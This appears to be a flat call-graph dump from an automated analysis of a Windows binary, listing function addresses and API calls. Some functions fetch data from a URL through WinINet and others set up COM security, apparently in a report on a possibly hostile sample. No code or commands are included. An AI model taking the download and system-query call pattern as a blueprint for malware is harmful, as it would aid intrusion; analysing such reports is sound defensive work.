414e70 std::ios_base::clear 46 API calls 60596->60600 60603 4d0be1 60597->60603 61081 4ee3c0 46 API calls 60597->61081 60598 4ce748 60602 414fd0 std::ios_base::clear 46 API calls 60598->60602 60599 4d0a73 61080 4ce2c0 48 API calls std::ios_base::clear 60599->61080 60600->60597 60608 4ce758 60602->60608 60604 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 60603->60604 60606 4d0bec 60604->60606 60607 4d0b87 61082 4172e0 46 API calls ctype 60607->61082 60609 4ce7a9 60608->60609 60611 414e70 std::ios_base::clear 46 API calls 60608->60611 60612 4ce849 60609->60612 61037 4ee3c0 46 API calls 60609->61037 60611->60609 60613 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 60612->60613 60617 4ce854 Concurrency::wait 60613->60617 60615 4ce7ef 61038 4172e0 46 API calls ctype 60615->61038 60617->60617 60618 41a1e0 std::ios_base::clear 46 API calls 60617->60618 60619 4ce8e1 60618->60619 60877 42f900 60619->60877 60621 4ce8e6 Concurrency::wait 60621->60621 60622 41a1e0 std::ios_base::clear 46 API calls 60621->60622 60623 4ce976 60622->60623 60946 4309a0 60623->60946 61083 50be90 60848->61083 60850 50c0a9 60850->60590 60853 50c09d __aulldiv __vswprintf_s_l 60853->60850 61103 50bbb0 60853->61103 60856 431a94 __aulldiv Concurrency::wait __vswprintf_s_l 60855->60856 60857 41a1e0 std::ios_base::clear 46 API calls 60856->60857 60858 431b72 60857->60858 60859 431bb4 60858->60859 60860 414e70 std::ios_base::clear 46 API calls 60858->60860 60861 431c30 60859->60861 61229 4ee3c0 46 API calls 60859->61229 60860->60859 60862 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 60861->60862 60865 431c3b Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 60862->60865 60864 431bf1 61230 4172e0 46 API calls ctype 60864->61230 60867 54e93c 46 API calls 60865->60867 60868 431cc6 60867->60868 60869 431cfa 60868->60869 60871 54edcb 74 API calls 60868->60871 60870 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 60869->60870 60872 431d0b 60870->60872 60873 431cdf 60871->60873 60872->60598 60872->60599 60874 54e81e 46 API calls 60873->60874 60875 431ceb 60874->60875 60876 54ea78 77 API calls 60875->60876 60876->60869 60878 42f920 Concurrency::wait 60877->60878 60879 41a1e0 std::ios_base::clear 46 API calls 60878->60879 60880 42f95c __aulldiv __vswprintf_s_l 60879->60880 60881 414fd0 std::ios_base::clear 46 API calls 60880->60881 60882 42fa80 60881->60882 60883 42fac2 60882->60883 60884 414e70 std::ios_base::clear 46 API calls 60882->60884 60885 42fb4a 60883->60885 61231 4ee3c0 46 API calls 60883->61231 60884->60883 60886 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 60885->60886 60889 42fb55 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 60886->60889 60888 42faff 61232 4172e0 46 API calls ctype 60888->61232 60891 54e93c 46 API calls 60889->60891 60892 42fbfe 60891->60892 60893 4303cc 60892->60893 60898 42fc0e __aulldiv __vswprintf_s_l 60892->60898 60894 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 60893->60894 60895 4303d8 60894->60895 60896 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 60895->60896 60897 42fee7 60896->60897 60897->60621 60899 54f2dd __fread_nolock 55 API calls 60898->60899 60900 42fe04 __aulldiv __vswprintf_s_l 60899->60900 60901 42fec7 60900->60901 60907 42feef __aulldiv __vswprintf_s_l 60900->60907 60902 54ea78 77 API calls 60901->60902 60903 42fed0 60902->60903 60904 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 60903->60904 60905 42fedf 60904->60905 60906 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 60905->60906 60906->60897 60908 54edcb 74 API calls 60907->60908 60909 42ffdb 60908->60909 60910 54e81e 46 API calls 60909->60910 60911 42ffe7 __aulldiv __vswprintf_s_l 60910->60911 60912 54edcb 74 API calls 60911->60912 60913 43017c 60912->60913 60914 41bba0 46 API calls 60913->60914 60915 43018d __aulldiv Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error __vswprintf_s_l 60913->60915 60914->60915 60916 54f2dd __fread_nolock 55 API calls 60915->60916 60917 4302f6 60916->60917 60918 53e35a 3 API calls 60917->60918 60919 430347 60917->60919 60947 4309c0 Concurrency::wait 60946->60947 60948 41a1e0 std::ios_base::clear 46 API calls 60947->60948 60949 4309fc __aulldiv __vswprintf_s_l 60948->60949 60950 414fd0 std::ios_base::clear 46 API calls 60949->60950 60952 430b20 60950->60952 61034->60584 61035->60586 61036->60587 61037->60615 61038->60612 61080->60589 61081->60607 61082->60603 61124 50b840 61083->61124 61087 50bed8 61087->60853 61088 50becc Concurrency::wait 61088->61087 61089 41a1e0 std::ios_base::clear 46 API calls 61088->61089 61090 50bf35 61089->61090 61091 50bf6e 61090->61091 61092 414e70 std::ios_base::clear 46 API calls 61090->61092 61093 50bfde 61091->61093 61133 4ee3c0 46 API calls 61091->61133 61092->61091 61094 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61093->61094 61096 50bfe6 61094->61096 61098 50bfec lstrlenA 61096->61098 61099 50bffe 61096->61099 61097 50bfa2 61134 4172e0 46 API calls ctype 61097->61134 61100 50c00a GetProcessHeap HeapAlloc lstrcpynA 61098->61100 61099->61100 61100->61087 61104 50bc02 _Error_objects 61103->61104 61135 50b890 InternetOpenA 61104->61135 61107 50bc60 61109 41e940 43 API calls 61107->61109 61108 50bc77 InternetOpenUrlA 61111 50bcdb InternetReadFile 61108->61111 61112 50bccf 61108->61112 61115 50bc6f 61109->61115 61113 50bd1a 61111->61113 61119 50bcff 61111->61119 61155 41e940 61112->61155 61116 54e93c 46 API calls 61113->61116 61123 50c050 GetProcessHeap HeapFree 61115->61123 61117 50bdf6 61116->61117 61117->61112 61149 54f0ca 61117->61149 61119->61111 61119->61113 61145 4f4830 61119->61145 61122 54ea78 77 API calls 61122->61112 61123->60850 61125 50b800 CharNextA 61124->61125 61126 50b856 61125->61126 61127 50b800 CharNextA 61126->61127 61128 50b87e 61127->61128 61129 50b800 61128->61129 61130 50b819 61129->61130 61131 50b831 61130->61131 61132 50b80c CharNextA 61130->61132 61131->61088 61132->61130 61133->61097 61134->61093 61136 50b8fa InternetConnectA 61135->61136 61142 50b8f0 61135->61142 61139 50b944 HttpOpenRequestA 61136->61139 61140 50ba26 61139->61140 61141 50ba2e GetLastError 61140->61141 61144 50ba59 __aulldiv __vswprintf_s_l 61140->61144 61141->61144 61142->61107 61142->61108 61143 50bb5f InternetCloseHandle 61143->61142 61144->61142 61144->61143 61146 4f4896 61145->61146 61147 4f4855 61145->61147 61159 4fb8b0 61146->61159 61147->61119 61150 54f0dd __vswprintf_s_l 61149->61150 61176 54eeac 61150->61176 61152 54f0f2 61153 54ae4c __vswprintf_s_l 43 API calls 61152->61153 61154 50be35 61153->61154 61154->61122 61156 41e9ac error_info_injector 61155->61156 61157 41e975 61155->61157 61156->61115 61157->61156 61228 40dc20 43 API calls Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 61157->61228 61160 4fb91e 61159->61160 61162 4fb947 61160->61162 61174 41db00 45 API calls std::ios_base::clear 61160->61174 61163 4fb983 61162->61163 61164 4fb972 61162->61164 61166 53e01e std::_Facet_Register 17 API calls 61163->61166 61167 4fb97b 61163->61167 61165 41d950 std::ios_base::clear 46 API calls 61164->61165 61165->61167 61166->61167 61170 5005e0 61167->61170 61169 4fba9f 61169->61147 61171 500615 61170->61171 61172 50064c error_info_injector 61170->61172 61171->61172 61175 40dc20 43 API calls Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 61171->61175 61172->61169 61174->61162 61175->61172 61177 54eee2 61176->61177 61178 54eeba 61176->61178 61177->61152 61178->61177 61179 54eec7 61178->61179 61180 54eee9 61178->61180 61192 552fbf 29 API calls 3 library calls 61179->61192 61184 54ee05 61180->61184 61185 54ee11 ___unDNameEx 61184->61185 61193 54f8d3 EnterCriticalSection 61185->61193 61187 54ee1f 61194 54ee60 61187->61194 61191 54ee3d 61191->61152 61192->61177 61193->61187 61202 55c19d 61194->61202 61200 54ee2c 61201 54ee54 LeaveCriticalSection __fread_nolock 61200->61201 61201->61191 61219 55c15f 61202->61219 61204 54ee78 61209 54ef23 61204->61209 61205 55c1ae 61205->61204 61226 55a608 15 API calls 3 library calls 61205->61226 61207 55c207 61208 55a5ce ___std_exception_copy 14 API calls 61207->61208 61208->61204 61212 54ef35 61209->61212 61213 54ee96 61209->61213 61210 54ef43 61227 552fbf 29 API calls 3 library calls 61210->61227 61212->61210 61212->61213 61216 54ef79 ctype 61212->61216 61218 55c248 72 API calls 61213->61218 61214 552b98 72 API calls 61214->61216 61215 55c123 __fread_nolock 43 API calls 61215->61216 61216->61213 61216->61214 61216->61215 61217 5583ea 72 API calls 61216->61217 61217->61216 61218->61200 61220 55c16b 61219->61220 61221 55c195 61220->61221 61222 55c123 __fread_nolock 43 API calls 61220->61222 61221->61205 61223 55c186 61222->61223 61224 5612fd __fread_nolock 43 API calls 61223->61224 61225 55c18c 61224->61225 61225->61205 61226->61207 61227->61213 61228->61156 61229->60864 61230->60861 61231->60888 61232->60885 61395 43d4d0 61412 43d4d9 Concurrency::wait Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 61395->61412 61396 43da27 61398 5524d3 43 API calls 61396->61398 61399 43da4b 61398->61399 61401 4150c0 std::bad_exception::bad_exception 46 API calls 61399->61401 61400 53e01e std::_Facet_Register 17 API calls 61400->61412 61402 43da7a 61401->61402 61403 4f12c0 43 API calls 61402->61403 61404 43da12 61403->61404 61405 4187e0 46 API calls 61405->61412 61406 4f4e30 46 API calls 61406->61412 61407 41a1e0 46 API calls std::ios_base::clear 61407->61412 61408 417380 Concurrency::wait 46 API calls 61408->61412 61409 508d80 70 API calls 61409->61412 61410 417140 43 API calls Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 61410->61412 61412->61396 61412->61400 61412->61405 61412->61406 61412->61407 61412->61408 61412->61409 61412->61410 61413 43d9e1 61412->61413 61419 5524d3 61412->61419 61422 4ed720 43 API calls 2 library calls 61412->61422 61414 4150c0 std::bad_exception::bad_exception 46 API calls 61413->61414 61415 43d9ff 61414->61415 61416 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61415->61416 61417 43da0a 61416->61417 61418 4f12c0 43 API calls 61417->61418 61418->61404 61423 55a0f1 GetLastError 61419->61423 61422->61412 61424 55a107 61423->61424 61425 55a10d 61423->61425 61450 55ab73 6 API calls std::_Lockit::_Lockit 61424->61450 61429 55a111 SetLastError 61425->61429 61451 55abb2 6 API calls std::_Lockit::_Lockit 61425->61451 61428 55a129 61428->61429 61431 55c286 __dosmaperr 14 API calls 61428->61431 61432 55a1a6 61429->61432 61433 5524d8 61429->61433 61434 55a13e 61431->61434 61456 5535b4 43 API calls std::locale::_Setgloballocale 61432->61456 61433->61412 61436 55a157 61434->61436 61437 55a146 61434->61437 61453 55abb2 6 API calls std::_Lockit::_Lockit 61436->61453 61452 55abb2 6 API calls std::_Lockit::_Lockit 61437->61452 61441 55a154 61446 55a5ce ___std_exception_copy 14 API calls 61441->61446 61442 55a163 61443 55a167 61442->61443 61444 55a17e 61442->61444 61454 55abb2 6 API calls std::_Lockit::_Lockit 61443->61454 61455 559f1f 14 API calls __dosmaperr 61444->61455 61446->61429 61448 55a189 61449 55a5ce ___std_exception_copy 14 API calls 61448->61449 61449->61429 61450->61425 61451->61428 61452->61441 61453->61442 61454->61441 61455->61448 61457 433cf0 61458 433d06 61457->61458 61459 53e01e std::_Facet_Register 17 API calls 61458->61459 61460 433d10 __aulldiv Concurrency::wait __vswprintf_s_l 61459->61460 61460->61460 61461 4f4e30 46 API calls 61460->61461 61462 433eb5 61461->61462 61463 414fd0 std::ios_base::clear 46 API calls 61462->61463 61464 433ec4 61463->61464 61465 4150c0 std::bad_exception::bad_exception 46 API calls 61464->61465 61466 433ed9 61465->61466 61467 508d80 70 API calls 61466->61467 61468 433ee9 61467->61468 61469 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61468->61469 61470 433ef4 61469->61470 61471 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61470->61471 61472 433efc 61471->61472 61473 433f10 61474 414fd0 std::ios_base::clear 46 API calls 61473->61474 61475 433f39 61474->61475 61476 433f8a 61475->61476 61477 414e70 std::ios_base::clear 46 API calls 61475->61477 61478 43401b 61476->61478 61656 4ee3c0 46 API calls 61476->61656 61477->61476 61479 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61478->61479 61483 434026 _Error_objects 61479->61483 61481 433fd0 61657 4172e0 46 API calls ctype 61481->61657 61484 4187e0 46 API calls 61483->61484 61485 4341e8 61484->61485 61486 417380 Concurrency::wait 46 API calls 61485->61486 61487 434240 Concurrency::wait 61486->61487 61488 414e70 std::ios_base::clear 46 API calls 61487->61488 61489 43425b Concurrency::wait 61488->61489 61489->61489 61490 417380 Concurrency::wait 46 API calls 61489->61490 61491 4342c2 Concurrency::wait 61490->61491 61492 414e70 std::ios_base::clear 46 API calls 61491->61492 61493 4342e7 Concurrency::wait 61492->61493 61494 432db0 92 API calls 61493->61494 61495 4342ff 61494->61495 61496 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61495->61496 61497 43430d 61496->61497 61498 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61497->61498 61499 434318 61498->61499 61500 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61499->61500 61501 434323 61500->61501 61502 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61501->61502 61503 43432e 61502->61503 61504 53e35a 3 API calls 61503->61504 61505 43437b 61503->61505 61507 43434e _Error_objects 61504->61507 61517 4343fb Concurrency::wait 61505->61517 61660 4f4970 46 API calls 61505->61660 61507->61505 61658 53e28a 46 API calls _Error_objects 61507->61658 61508 434575 61512 43568d 61508->61512 61515 53e35a 3 API calls 61508->61515 61520 4345ce 61508->61520 61510 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61510->61508 61511 43436e 61659 53e309 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 61511->61659 61513 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61512->61513 61516 435698 61513->61516 61525 4345a1 _Error_objects 61515->61525 61518 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61516->61518 61526 41a1e0 std::ios_base::clear 46 API calls 61517->61526 61531 434522 61517->61531 61519 4356a0 61518->61519 61522 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61519->61522 61528 43464e 61520->61528 61663 4f4970 46 API calls 61520->61663 61527 4356a8 61522->61527 61524 43468f 61665 4ec9c0 46 API calls 61524->61665 61525->61520 61661 53e28a 46 API calls _Error_objects 61525->61661 61526->61531 61664 4f39a0 59 API calls 61528->61664 61531->61508 61531->61510 61532 4346bc 61666 4ec980 46 API calls 61532->61666 61533 4345c1 61662 53e309 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 61533->61662 61536 4346ce 61667 4f27a0 43 API calls __Getctype 61536->61667 61538 435540 61541 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61538->61541 61539 434708 61539->61538 61668 4357d0 46 API calls std::bad_exception::bad_exception 61539->61668 61542 435550 61541->61542 61544 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61542->61544 61543 434746 61669 4f2850 43 API calls __Getctype 61543->61669 61546 43555b 61544->61546 61548 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61546->61548 61547 434751 61670 4f37b0 46 API calls 3 library calls 61547->61670 61549 435566 61548->61549 61550 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61549->61550 61552 435571 61550->61552 61553 414fd0 std::ios_base::clear 46 API calls 61552->61553 61557 435581 61553->61557 61554 434806 Concurrency::wait 61671 506060 46 API calls __Getctype 61554->61671 61556 4355d2 61559 435663 61556->61559 61701 4ee3c0 46 API calls 61556->61701 61557->61556 61558 414e70 std::ios_base::clear 46 API calls 61557->61558 61558->61556 61561 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61559->61561 61563 43566e 61561->61563 61562 435618 61702 4172e0 46 API calls ctype 61562->61702 61703 4f0610 46 API calls 3 library calls 61563->61703 61567 434865 Concurrency::wait Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error __vswprintf_s_l 61672 420e20 14 API calls 4 library calls 61567->61672 61568 434a8c 61569 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61568->61569 61570 434a9a 61569->61570 61675 4f2850 43 API calls __Getctype 61570->61675 61573 434aa5 61676 4f37b0 46 API calls 3 library calls 61573->61676 61574 434a7d 61576 54e05e ___std_exception_copy 14 API calls 61574->61576 61575 434937 __aulldiv __vswprintf_s_l 61575->61568 61673 4210e0 14 API calls 4 library calls 61575->61673 61576->61568 61577 434a01 61577->61574 61674 4172e0 46 API calls ctype 61577->61674 61580 434a71 61581 54e05e ___std_exception_copy 14 API calls 61580->61581 61581->61574 61582 434b5e Concurrency::wait 61677 506060 46 API calls __Getctype 61582->61677 61585 434bbd Concurrency::wait Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error __vswprintf_s_l 61678 420e20 14 API calls 4 library calls 61585->61678 61586 434de4 61587 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61586->61587 61588 434df2 61587->61588 61681 4f2850 43 API calls __Getctype 61588->61681 61591 434dfd 61682 4f37b0 46 API calls 3 library calls 61591->61682 61592 434dd5 61593 54e05e ___std_exception_copy 14 API calls 61592->61593 61593->61586 61595 434d59 61595->61592 61680 4172e0 46 API calls ctype 61595->61680 61597 434c8f __aulldiv __vswprintf_s_l 61597->61586 61679 4210e0 14 API calls 4 library calls 61597->61679 61598 434dc9 61599 54e05e ___std_exception_copy 14 API calls 61598->61599 61599->61592 61600 434eba Concurrency::wait 61656->61481 61657->61478 61658->61511 61659->61505 61660->61517 61661->61533 61662->61520 61663->61528 61664->61524 61665->61532 61666->61536 61667->61539 61668->61543 61669->61547 61670->61554 61671->61567 61672->61575 61673->61577 61674->61580 61675->61573 61676->61582 61677->61585 61678->61597 61679->61595 61680->61598 61681->61591 61682->61600 61701->61562 61702->61559 61703->61512 61704 4327d0 CoInitializeEx 61705 4327f1 CoInitializeSecurity 61704->61705 61706 4327ec 61704->61706 61707 432812 CoUninitialize 61705->61707 61708 43281d CoCreateInstance 61705->61708 61707->61706 61709 432845 61708->61709 61710 43284b CoUninitialize 61708->61710 61709->61710 61711 432856 61709->61711 61710->61706 61735 41f8a0 61711->61735 61713 432875 61714 4328c5 61713->61714 61745 41f930 SysFreeString error_info_injector 61713->61745 61715 4328d8 CoUninitialize 61714->61715 61717 4328e3 61714->61717 61715->61706 61740 41f830 61717->61740 61719 432902 61720 41f830 27 API calls 61719->61720 61721 432933 61720->61721 61722 43297f 61721->61722 61746 41f930 SysFreeString error_info_injector 61721->61746 61726 432994 61722->61726 61747 41f930 SysFreeString error_info_injector 61722->61747 61725 4329a7 CoUninitialize 61725->61706 61726->61725 61732 4329b2 _memcpy_s 61726->61732 61727 432aa0 CoUninitialize 61727->61706 61728 4329fa 61728->61727 61730 414fd0 std::ios_base::clear 46 API calls 61730->61732 61731 4f4620 46 API calls 61731->61732 61732->61727 61732->61728 61732->61730 61732->61731 61733 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61732->61733 61748 41f490 56 API calls 2 library calls 61732->61748 61734 432a83 VariantClear 61733->61734 61734->61732 61736 53e01e std::_Facet_Register 17 API calls 61735->61736 61737 41f8b0 61736->61737 61738 41f8bc SysAllocString 61737->61738 61739 41f8e7 _com_issue_error 61737->61739 61738->61739 61739->61713 61741 53e01e std::_Facet_Register 17 API calls 61740->61741 61742 41f840 61741->61742 61743 41f869 _com_issue_error 61742->61743 61749 540110 25 API calls 4 library calls 61742->61749 61743->61719 61745->61714 61746->61722 61747->61726 61748->61732 61749->61743 61750 450910 61751 45092d __aulldiv _memcpy_s Concurrency::wait __vswprintf_s_l 61750->61751 61751->61751 61752 41a1e0 std::ios_base::clear 46 API calls 61751->61752 61756 450ad4 Concurrency::wait 61752->61756 61753 450cef 61754 4186f0 46 API calls 61753->61754 61755 450db9 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 61754->61755 61758 42b840 2 API calls 61755->61758 61756->61753 61757 41a1e0 std::ios_base::clear 46 API calls 61756->61757 61759 450cd2 61757->61759 61760 450dc9 61758->61760 61761 414e70 std::ios_base::clear 46 API calls 61759->61761 61762 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61760->61762 61763 450ce4 61761->61763 61764 450dd7 61762->61764 61765 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61763->61765 61766 450ddf 61764->61766 61768 450dff 61764->61768 61765->61753 61767 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61766->61767 61840 450df4 61767->61840 61769 4186f0 46 API calls 61768->61769 61770 450ec9 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 61769->61770 61771 42b840 2 API calls 61770->61771 61772 450ed9 61771->61772 61773 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61772->61773 61774 450ee7 61773->61774 61775 450eef 61774->61775 61777 450f0f 61774->61777 61776 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61775->61776 61776->61840 61778 4186f0 46 API calls 61777->61778 61779 450fd9 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 61778->61779 61780 42b840 2 API calls 61779->61780 61781 450fe9 61780->61781 61782 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61781->61782 61783 450ff7 61782->61783 61784 450fff 61783->61784 61786 45101f 61783->61786 61785 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61784->61785 61785->61840 61787 4186f0 46 API calls 61786->61787 61788 4510e9 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 61787->61788 61789 42b840 2 API calls 61788->61789 61790 4510f9 61789->61790 61791 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61790->61791 61792 451107 61791->61792 61793 45110f 61792->61793 61795 45112f 61792->61795 61794 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61793->61794 61794->61840 61796 4186f0 46 API calls 61795->61796 61797 4511f9 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 61796->61797 61798 42b840 2 API calls 61797->61798 61799 451209 61798->61799 61800 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61799->61800 61801 451217 61800->61801 61802 45121f 61801->61802 61804 45123f 61801->61804 61803 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61802->61803 61803->61840 61805 4186f0 46 API calls 61804->61805 61806 451309 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 61805->61806 61807 42b840 2 API calls 61806->61807 61808 451319 61807->61808 61809 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61808->61809 61810 451327 61809->61810 61811 45132f 61810->61811 61813 45134f 61810->61813 61812 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61811->61812 61812->61840 61814 4186f0 46 API calls 61813->61814 61815 451419 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 61814->61815 61816 42b840 2 API calls 61815->61816 61817 451429 61816->61817 61818 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61817->61818 61819 451437 61818->61819 61820 45143f 61819->61820 61822 45145f 61819->61822 61821 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61820->61821 61821->61840 61823 4186f0 46 API calls 61822->61823 61824 451529 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 61823->61824 61825 42b840 2 API calls 61824->61825 61826 451539 61825->61826 61827 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61826->61827 61828 451547 61827->61828 61829 45154f 61828->61829 61831 45156f 61828->61831 61830 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61829->61830 61830->61840 61832 4186f0 46 API calls 61831->61832 61833 451639 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 61832->61833 61834 42b840 2 API calls 61833->61834 61835 451649 61834->61835 61836 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 61835->61836 61837 451657 61836->61837 61838 45165f 61837->61838 61841 45167f 61837->61841 61842 4186f0 46 API calls 61841->61842 62130 46c8d0 62131 46c8dd Concurrency::wait _Error_objects 62130->62131 62132 41a1e0 std::ios_base::clear 46 API calls 62131->62132 62133 46ca05 62132->62133 62134 4f4620 46 API calls 62133->62134 62135 46ca14 62134->62135 62136 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62135->62136 62137 46ca1f Concurrency::wait 62136->62137 62138 41a1e0 std::ios_base::clear 46 API calls 62137->62138 62139 46cb50 62138->62139 62140 4f4620 46 API calls 62139->62140 62141 46cb5f 62140->62141 62142 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62141->62142 62143 46cb6a Concurrency::wait 62142->62143 62144 41a1e0 std::ios_base::clear 46 API calls 62143->62144 62145 46cc9b 62144->62145 62146 4f4620 46 API calls 62145->62146 62147 46ccaa 62146->62147 62148 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62147->62148 62149 46ccb5 Concurrency::wait 62148->62149 62150 41a1e0 std::ios_base::clear 46 API calls 62149->62150 62151 46cde6 62150->62151 62152 4f4620 46 API calls 62151->62152 62153 46cdf5 62152->62153 62154 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62153->62154 62155 46ce00 Concurrency::wait 62154->62155 62156 41a1e0 std::ios_base::clear 46 API calls 62155->62156 62157 46cf31 62156->62157 62158 4f4620 46 API calls 62157->62158 62159 46cf40 62158->62159 62160 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62159->62160 62161 46cf4b Concurrency::wait 62160->62161 62162 41a1e0 std::ios_base::clear 46 API calls 62161->62162 62163 46d07c 62162->62163 62164 4f4620 46 API calls 62163->62164 62165 46d08b 62164->62165 62166 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62165->62166 62167 46d096 Concurrency::wait 62166->62167 62168 41a1e0 std::ios_base::clear 46 API calls 62167->62168 62169 46d1c7 62168->62169 62170 4f4620 46 API calls 62169->62170 62171 46d1d6 62170->62171 62172 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62171->62172 62173 46d1e1 Concurrency::wait 62172->62173 62174 41a1e0 std::ios_base::clear 46 API calls 62173->62174 62175 46d312 62174->62175 62176 4f4620 46 API calls 62175->62176 62177 46d321 62176->62177 62178 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62177->62178 62179 46d32c Concurrency::wait 62178->62179 62180 41a1e0 std::ios_base::clear 46 API calls 62179->62180 62181 46d45d 62180->62181 62182 4f4620 46 API calls 62181->62182 62183 46d46c 62182->62183 62184 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62183->62184 62185 46d477 Concurrency::wait 62184->62185 62186 41a1e0 std::ios_base::clear 46 API calls 62185->62186 62187 46d5a8 62186->62187 62188 4f4620 46 API calls 62187->62188 62189 46d5b7 62188->62189 62190 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62189->62190 62191 46d5c2 Concurrency::wait 62190->62191 62192 41a1e0 std::ios_base::clear 46 API calls 62191->62192 62193 46d6f3 62192->62193 62194 4f4620 46 API calls 62193->62194 62195 46d702 62194->62195 62196 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62195->62196 62197 46d70d Concurrency::wait 62196->62197 62198 41a1e0 std::ios_base::clear 46 API calls 62197->62198 62467 47deb0 62468 47dec2 Concurrency::wait _Error_objects 62467->62468 62469 41a1e0 std::ios_base::clear 46 API calls 62468->62469 62470 47dfd2 62469->62470 62471 4f4620 46 API calls 62470->62471 62472 47dfe1 62471->62472 62473 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62472->62473 62474 47dfec __aulldiv _memcpy_s Concurrency::wait __vswprintf_s_l 62473->62474 62475 41a1e0 std::ios_base::clear 46 API calls 62474->62475 62476 47e238 62475->62476 62477 441af0 58 API calls 62476->62477 62479 47e244 Concurrency::wait 62477->62479 62478 47e5fc Concurrency::wait 62480 41a1e0 std::ios_base::clear 46 API calls 62478->62480 62479->62478 62481 41a1e0 std::ios_base::clear 46 API calls 62479->62481 62483 47e708 62480->62483 62482 47e3b4 62481->62482 62485 4f7b50 46 API calls 